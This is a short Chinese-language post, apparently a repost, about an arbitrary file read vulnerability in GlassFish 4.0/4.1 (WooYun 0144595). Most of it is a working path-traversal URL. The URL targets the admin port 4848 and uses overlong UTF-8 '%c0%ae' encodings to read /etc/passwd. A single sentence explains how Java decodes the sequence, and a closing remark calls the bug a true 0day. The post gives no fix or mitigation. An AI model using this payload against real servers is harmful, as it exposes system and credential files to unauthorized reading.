1. 程式人生 > >glassfish任意檔案讀取漏洞(4.0/4.1)

glassfish任意檔案讀取漏洞(4.0/4.1)

相關廠商:glassfish

漏洞編號:wooyun-2010-0144595

漏洞詳情:

http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

java語音中會把"%c0%ae"解析為"\uC0AE",最後轉義為ASCCII字元的"."(點)。

簡簡單單幾句話詳述了漏洞內容,而且這是一枚真真正正的0day漏洞,並且更有趣的是這個漏洞的提交者同樣是一個真真正正的路人甲。